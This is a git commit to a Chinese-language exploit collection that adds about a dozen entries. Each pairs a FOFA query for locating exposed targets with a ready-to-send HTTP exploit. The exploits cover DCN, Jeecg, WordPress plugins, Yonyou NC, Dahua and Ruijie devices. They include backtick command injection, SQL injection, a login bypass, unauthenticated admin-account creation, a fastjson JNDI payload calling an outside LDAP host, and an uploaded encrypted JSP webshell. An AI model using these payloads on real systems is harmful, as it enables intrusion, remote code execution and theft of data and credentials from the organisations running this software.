528更新漏洞

2024-05-28 18:58:41 +08:00 · 2024-05-28 18:58:41 +08:00 · 903e24d279
commit 903e24d279
parent 4d11bd309d
15 changed files with 513 additions and 1 deletions
--- a/DCN有线无线智能一体化控制器WEB管理系统.md
+++ b/DCN有线无线智能一体化控制器WEB管理系统.md
@ -0,0 +1,21 @@
+## DCN有线无线智能一体化控制器WEB管理系统
+
+
+
+## fofa
+
+```
+app="DCN-DCWS-6028"
+```
+
+## poc
+
+```
+GET /goform/UserPassOperation?user=admin333&password=123456&userpriority=15&operation=1 HTTP/1.1
+Host: your-ip
+Content-Length: 2
+```
+
+
+
+![image-20240525204429235](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405252044322.png)
--- a/Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md
+++ b/Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md
@ -0,0 +1,53 @@
+## Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞
+
+Jeecg (J2EE C ode G eneration)是一款基于代码生成器的低代码开发平台, 使用 JEECG 可以简单快速地开发出企业级的 Web 应用系统。目前官方已停 止维护。 JEECG 4.0 及之前版本中，由于 /api 接口鉴权时未过滤路径遍历，攻击 者可构造包含 ../ 的 url 绕过鉴权。
+
+因为依赖 1.2.31 版本的 fastjson， 该版本存在反序列化漏洞。攻击者可对 /api/../jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻 击实现远程代码执行
+
+
+
+## fofa
+
+```
+app="JEECG"
+```
+
+## poc
+
+创建如下远程文件，其内容为fastjson代码执行的payload
+
+```
+        {
+            "a":{
+                "@type":"java.lang.Class",
+                "val":"com.sun.rowset.JdbcRowSetImpl"
+            },
+            "b":{
+                "@type":"com.sun.rowset.JdbcRowSetImpl",
+                "dataSourceName":"ldap://10.66.64.89:1389/8orsiq",
+                "autoCommit":true
+            }
+        }
+```
+
+```
+POST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+cmd: whoami
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+
+serverUrl=http://xxxxxxxx:8877/jeecg.txt&requestBody=1&requestMethod=GET
+```
+
+![image-20240526195416290](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261954336.png)
+
+![image-20240526195357757](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261953813.png)
--- a/README.md
+++ b/README.md
@ -1,7 +1,22 @@
 # 漏洞收集
 收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了500多个poc/exp，善用CTRL+F搜索

+## 2024.05.28 新增漏洞

+- DCN有线无线智能一体化控制器WEB管理系统
+- 用友NC系统linkVoucher存在sql注入漏洞
+- 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行
+- 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行
+- 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行
+- 锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行
+- 锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行
+- 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取
+- 锐捷RG-EW1200G无线路由器登录绕过
+- Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞
+- WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495)
+- WordPress-WebDirectory插件存在sql注入(CVE-2024-3552)
+- WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443)
+- 因酷教育软件开源网校程序gok4任意文件上传漏洞

 ## 2024.05.25 新增漏洞

@ -609,7 +624,7 @@
 - 致远OA wpsAssistServlet任意文件读取漏洞
 - 金和OA任意文件读取漏洞
  
-## 2023.11.03
+## 2023.11.03 新增漏洞
 - XXL-JOB默认accessToken身份绕过漏洞
 - Confluence身份认证绕过(CVE-2023-22518)
  
--- a/WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495).md
+++ b/WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495).md
@ -0,0 +1,34 @@
+## WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495)
+
+  WordPress的Country State City Dropdown CF 7插件是一款用于WordPress网站的插件，它可以与Contact Form 7（CF 7）表单插件配合使用，为用户提供了一个方便的方式来在表单中选择国家、州/省和城市。
+
+  WordPress的Country State City Dropdown CF 7插件在2.7.2之前的版本中容易受到通过'cnt'和'sid'参数的SQL注入的攻击，未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息，导致凭证密钥等信息泄露，深入利用还可能会对服务器造成严重威胁。这是由于用户提供的参数没有足够的转义以及对现有SQL查询缺乏足够的准备。
+
+## fofa
+
+```
+body="/wp-content/plugins/country-state-city-auto-dropdown/"
+```
+
+## poc
+
+```
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 172
+
+action=tc_csca_get_cities&nonce_ajax=[获取的nonce值]&sid=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
+```
+
+访问首页获取nonce值
+
+![image-20240527192100424](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405271921470.png)
+
+![image-20240527192111670](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405271921731.png)
--- a/WordPress-WebDirectory插件存在sql注入(CVE-2024-3552).md
+++ b/WordPress-WebDirectory插件存在sql注入(CVE-2024-3552).md
@ -0,0 +1,28 @@
+## WordPress-WebDirectory插件存在sql注入(CVE-2024-3552)
+
+WordPress 的 Web Directory 免费插件在 1.6.9 及之前的所有版本中都容易受到 SQL 注入攻击，因为对用户提供的参数转义不充分，并且对现有 SQL 查询缺乏充分的准备。这使得未经身份验证的攻击者可以将额外的 SQL 查询附加到现有的查询中，这些查询可用于从数据库中提取敏感信息。
+
+## fofa
+
+```
+body="/wp-content/plugins/web-directory-free"
+```
+
+## poc
+
+```c
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: <Host>
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 95
+
+action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(5),0)+from+(select+1)x)
+```
+
+![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405280854244.png)
--- a/WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443).md
+++ b/WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443).md
@ -0,0 +1,20 @@
+## WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443)
+
+在 6.4.2 及之前的所有版本中，WordPress 的 Business Directory 插件 – Easy Listing Directorys for WordPress 插件很容易通过“listingfields”参数受到基于时间的 SQL 注入，因为对用户提供的参数转义不足且缺乏对现有 SQL 查询进行充分的准备。这使得未经身份验证的攻击者可以将额外的 SQL 查询附加到现有的查询中，这些查询可用于从数据库中提取敏感信息
+
+## fofa
+
+```
+"/wp-content/plugins/business-directory" && icon_hash="1198047028"
+```
+
+## poc
+
+```
+GET /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]= HTTP/1.1
+Host: 
+```
+
+
+
+![image-20240528091010272](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405280910316.png)
--- a/因酷教育软件开源网校程序gok4任意文件上传漏洞.md
+++ b/因酷教育软件开源网校程序gok4任意文件上传漏洞.md
@ -0,0 +1,40 @@
+## 因酷教育软件开源网校程序gok4任意文件上传漏洞
+
+inxedu v2.0.6组件controllerlmageUploadcontroller.class中的任意文件上传漏洞允许攻击者通过上传精心制作的jsp文件执行任意代码。
+
+## fofa
+
+```
+icon_hash="500708606"
+```
+
+## poc
+
+```bash
+POST /image/gok4?&param=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------1193235141139104622277612664
+Content-Length: 883
+Origin: http://127.0.0.1:8080
+Connection: close
+Referer: http://127.0.0.1:8080/admin/website/doAddImages
+Cookie: JSESSIONID=10EC81B49E27265587A446F32099DBE3; inxedulogin_sys_user_=inxedulogin_sys_user_1
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: iframe
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------1193235141139104622277612664
+Content-Disposition: form-data; name="uploadfile"; filename="1.jspx"
+Content-Type: image/jpeg
+
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>
+-----------------------------1193235141139104622277612664--
+```
+
+![image-20240527192638132](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405271926196.png)
--- a/大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取.md
+++ b/大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取.md
@ -0,0 +1,21 @@
+##  大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取
+
+大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调 配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管 理需求，同时通过提供智能服务，增强使用体验。
+
+ 由于该平台未对接口权限做限制，攻击者可以从 user_getUserInfoByUserName.action 接口获取任意用户密码(MD5 格式)。
+
+## fofa
+
+```
+body="src=/WPMS/asset/common/js/jsencrypt.min.js"
+```
+
+## poc
+
+```
+GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
+Host: xxxxxxxxx
+Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405262009978.png)
--- a/用友NC系统linkVoucher存在sql注入漏洞.md
+++ b/用友NC系统linkVoucher存在sql注入漏洞.md
@ -0,0 +1,25 @@
+## 用友NC系统linkVoucher存在sql注入漏洞
+
+NC65系统/portal/pt/yercommon/linkVoucher请求中pkBill存在SQL注入漏洞，可能导致服务器数据泄露。
+
+## fofa
+
+```
+title="YONYOU NC"
+```
+
+## poc
+
+```
+GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1 HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+```
+
+![image-20240526184707445](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261847497.png)
--- a/锐捷RG-EW1200G无线路由器登录绕过.md
+++ b/锐捷RG-EW1200G无线路由器登录绕过.md
@ -0,0 +1,33 @@
+# 锐捷RG-EW1200G无线路由器登录绕过
+
+锐捷网络RG-EW1200G HWR_1.0(1)B1P5,Release(07161417) r483存在登录绕过逻辑漏洞，允许任何用户无需密码即可获得设备管理员权限。登录路由器，获取敏感信息，控制内部网络。
+
+## fofa
+
+```
+body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
+icon_hash="1086165720"
+```
+
+## poc
+
+```
+POST /api/sys/login HTTP/1.1
+Host: xxx.xxx.xxx:6060
+Content-Length: 59
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
+Content-Type: application/x-www-form-urlencoded
+Origin: http://xxx.xxx.xxx:6060
+Referer: http://xxx.xxx.xxx:6060/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+sec-ch-ua-platform: "Windows"
+sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+Connection: close
+
+{"username":"2","password":"123","timestamp":1692412880000}
+```
+
+![image-20240526194459561](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261944604.png)
--- a/锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行.md
+++ b/锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行.md
@ -0,0 +1,48 @@
+## 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行
+
+锐捷RG-UAC中存在命令执行漏洞，应用程序管理网关后端 /view/vpn/autovpn/online.php接口。攻击者可以执行任意命令来控制服务器权限。
+
+## fofa
+
+```
+app="Ruijie-RG-UAC"
+```
+
+## poc
+
+```
+POST /view/vpn/autovpn/online.php HTTP/1.1
+Host: XXXXXXX:1443
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) 
+Gecko/20100101 Firefox/124.0
+Accept: 
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
+;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Origin: http://XXXXXXX:280
+Sec-GPC: 1
+Connection: close
+Referer: http://XXXXXXXXX:280/view/fireWall/PreDOSattack/list.php
+Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 0000:0000:0000::0000
+X-Originating-IP: 0000:0000:0000::0000
+X-Remote-IP: 0000:0000:0000::0000
+X-Remote-Addr: 0000:0000:0000::0000
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+
+peernode=`id+>1.txt`
+```
+
+![image-20240526185502840](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261855901.png)
+
+
+
+文件路径
+
+```
+/view/vpn/autovpn/1.txt
+```
+
--- a/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行.md
+++ b/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行.md
@ -0,0 +1,46 @@
+## 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行
+
+锐捷RG-UAC中存在命令执行漏洞，应用程序管理网关后端/view/networkConfig/RouteConfig/StaticRoute/static_route_edit_ipv6.php接口。攻击者可以执行任意命令来控制服务器权限。
+
+## fofa
+
+```
+app="Ruijie-RG-UAC"
+```
+
+## poc
+
+```
+POST /view/networkConfig/RouteConfig/StaticRoute/static_route_edit_ipv6.php?action=modify HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) 
+Gecko/20100101 Firefox/124.0
+Accept: 
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
+;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Sec-GPC: 1
+Connection: close
+Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 0000:0000:0000::0000
+X-Originating-IP: 0000:0000:0000::0000
+X-Remote-IP: 0000:0000:0000::0000
+X-Remote-Addr: 0000:0000:0000::0000
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+text_ip_addr=0000:0000:0000::0000&oldipmask=`id+>1.txt`&oldgateway=1
+```
+
+![image-20240526190337901](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261903959.png)
+
+
+
+文件路径
+
+```
+ /view/networkConfig/RouteConfig/StaticRoute/1.txt
+```
+
+![image-20240526190430052](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261904115.png)
--- a/锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md
+++ b/锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md
@ -0,0 +1,43 @@
+## 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行
+
+锐捷RG-UAC中存在命令执行漏洞，应用程序管理网关后端/view/vpn/autovpn/sub_commit.php接口。攻击者可以执行任意命令来控制服务器权限。
+
+## fofa
+
+```
+app="Ruijie-RG-UAC"
+```
+
+## poc
+
+```
+POST /view/vpn/autovpn/sub_commit.php?action=delete HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) 
+Gecko/20100101 Firefox/124.0
+Accept: 
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
+;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Sec-GPC: 1
+Connection: close
+Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 0000:0000:0000::0000
+X-Originating-IP: 0000:0000:0000::0000
+X-Remote-IP: 0000:0000:0000::0000
+X-Remote-Addr: 0000:0000:0000::0000
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+key=`id+>3.txt`
+```
+
+![image-20240526190815714](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261908795.png)
+
+
+
+文件路径 ` /view/vpn/autovpn/3.txt`
+
+![image-20240526190913268](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261909328.png)
--- a/锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行.md
+++ b/锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行.md
@ -0,0 +1,41 @@
+## 锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行
+
+锐捷RG-UAC中存在命令执行漏洞，应用程序管理网关后端//view/systemConfig/sys_user/user_commit.php接口。攻击者可以执行任意命令来控制服务器权限。
+
+## fofa
+
+```
+app="Ruijie-RG-UAC"
+```
+
+## poc
+
+```
+POST /view/systemConfig/sys_user/user_commit.php?action=add HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) 
+Gecko/20100101 Firefox/124.0
+Accept: 
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
+;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Sec-GPC: 1
+Connection: close
+Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 0000:0000:0000::0000
+X-Originating-IP: 0000:0000:0000::0000
+X-Remote-IP: 0000:0000:0000::0000
+X-Remote-Addr: 0000:0000:0000::0000
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+
+auth_method=1&pwd_policy=2&email2=`echo+"<?php+phpinfo();?>">1.php`&user_name=1
+```
+
+![image-20240526191201899](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261912985.png)
+
+文件路径` /view/systemConfig/sys_user/1.php`
+
+![image-20240526191306904](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261913960.png)
--- a/锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行.md
+++ b/锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行.md
@ -0,0 +1,44 @@
+## 锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行
+
+锐捷RG-UAC中存在命令执行漏洞，应用程序管理网关后端/view/networkConfig/vlan/vlan_add_commit.php接口。攻击者可以执行任意命令来控制服务器权限。
+
+## fofa
+
+```
+app="Ruijie-RG-UAC"
+```
+
+## poc
+
+```
+POST /view/networkConfig/vlan/vlan_add_commit.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) 
+Gecko/20100101 Firefox/124.0
+Accept: 
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imag
+e/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enUS;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Sec-GPC: 1
+Connection: close
+Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 0000:0000:0000::0000
+X-Originating-IP: 0000:0000:0000::0000
+X-Remote-IP: 0000:0000:0000::0000
+X-Remote-Addr: 0000:0000:0000::0000
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 28
+
+phyport=`id+>2.txt`&vlanid=1
+```
+
+![image-20240526191526483](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261915558.png)
+
+文件路径`/view/networkConfig/vlan/2.txt`
+
+![image-20240526191600183](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261916232.png)
+
+
+